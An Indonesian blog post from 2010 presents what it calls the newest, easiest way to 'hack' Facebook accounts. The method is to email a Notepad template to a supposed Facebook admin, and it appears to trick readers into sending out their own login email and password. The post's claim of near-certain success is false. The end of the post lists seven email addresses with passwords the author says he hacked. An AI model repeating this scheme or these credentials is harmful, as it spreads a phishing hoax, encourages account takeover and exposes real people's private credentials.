Selasa, 28 Desember 2010

cara terbaru dan termudah heck facebook 2010

Sedikit pengalaman yang saya lakukan untuk men coba cara terbaru membobol akun facebook orang dengan cara termudah membobol facebook orang 2010 tanpa menggunakan software, tapi cukup menggunakan notepad untuk membobol facebook orang dengan cara meminta replace password kepada admin facebook, bahkan ini bisa dibilang cara terbaru dan termudah membobol facebook 2010 dan ternyata 99% berhasil.
Seperti biasa.. artikel ini akan sangat menarik untuk di baca, jadi siapkan dulu camilan dan secangkir teh hangat.. silahkan meneruskan membacanya
Dalam hack facebook ini kita akan mengirimkan email ke admin@facebook.com dengan format email seperti ini.
Dear admin
My account has been use by another person,
please replace with my new Password: ••••••••••••
Old email: target@domain.com
Or send password to my new account: emai_anda@domain.com
Cara ini selalu berhasil. Tapi memang mesti nunggu dulu, alasannya mungkin yang minta juga banyak, tapi saya ada link admin facebook indonesia, paling lama 24 jam kita sudah bisa mendapatkan apa yang kita inginkan.. alamat emailnya apa,, mmm nanti saya kasih tau di tengah artikel, makanya baca dulu artikel ini semuanya..

berikut saya kasih tau caranya step by step
Pertama ketik dulu text berikut











Jika anda males menulisnya, anda bisa mendonloadnyadownloadshttp://.ziddu.com/downloadfile/13156753/hackerfacebook.txt.html

Wah bagi yang baru di bidang IT pasti pusing nih bacanya. Ga usah bingung kita langsung to the point aja.
Tulisan yang berwarna merah harus anda ganti
Sekarang tekan ctrl + h nanti akan muncul gambar seperti ini.


Ini fungsinya untuk mengganti data yang kita butuhkan.
Sekarang kita ganti dulu email target yang ingin kita hacker. Cari tulisan old_email
Tulis pada kolom Find What: old_email
Tulis pada kolom Replace with: emailtarget@domain.com
Kemudian klik replace..
Jika keluar gambar seperti ini

itu berarti bagian yang berkedip untuk menulis berada di bawah teks yang di cari. Pindahkan dulu ke paling atas..
Langkah selanjutnya, lakukan hal yang sama untuk new_email.. nah new email adalah alamat login facebook anda, tujuannya adalah balasan dari admin akan dituju ke alamat anda (nanti periksa di inbox FB anda). So new_email ganti dengan alamat email anda
Tulis pada kolom find what: new_email
Tulis pada kolom replace with: emailanda@domain.com
Yang berikutnya adalah permintaan penggantian password yang digunakan oleh target anda saat ini dengan password Login facebook anda. Disini harus ada kesamaan antara yang anda ganti dengan password anda sekarang. (pengalaman saya menuliskan password asal, malah tidak bisa masuk ke FB asli kita)
Ctrl + h lagi,
tulis pada kolom Find what: protect_me
tulis pada kolom Replace: password_anda
sekarang aksi yang terakhir adalah mengirimkan tulisan script yang telah kita rubah tadi. Caranya tekan ctrl + a, kemudian Ctrl + C
selanjutnya anda login facebook seperti biasa.
lalu pilih kirim email.
to: admin@facebook.com
subjek: replace my password
isinya tekan Ctrl + V
kemudian kirim.. tunngu deh balasan dari admin, anda harus sabar bisa nunggu berjam jam, berhari hari, bahkan berminggu minggu. tapi pasti di kirim ko.
klo saya sih suka ngirim ke dewisitimauludi tapi alamat emailnya lupa cari aja deh pilih yg ke dua. dia memiliki beberapa akun, yang pertama penuh jadi sekarang jarang merespon, kalian pasti tidak akan menyangka, dia adalah admin untuk indonesia.. kirim juga dengan format yang sama..
Buka Rahasia… yang sudah saya hack. tapi sekarang udah saya kasih lagi.. bagi saya ga perlu akun itu semua, cuma sebatas ingin mencoba ilmu baru aja..
yulianalistiarawati@yahoo.co.id
pass: 21071990
heray_setiawan@yahoo.co.id
pass: lilakusayang
imammuhamat@yahoo.co.id
pass: superhero
eka_lubis88@yahoo.com
pass: 19880702
asmudi@yahoo.co.id
pass: sby231184
dany_huaz@gmail.com
pass: protectfull
ridwan_andri@yahoo.co.id
pass: va56sco&pym3
dan masih banyak lagi.. mudah2n cara ini masih bisa di pake. klo saya sih Insya allah dah tobat ah..

0 komentar:

Poskan Komentar

radio

facebook like

mp 3

Powered by eSnips.com

Template by:

Free Blog Templates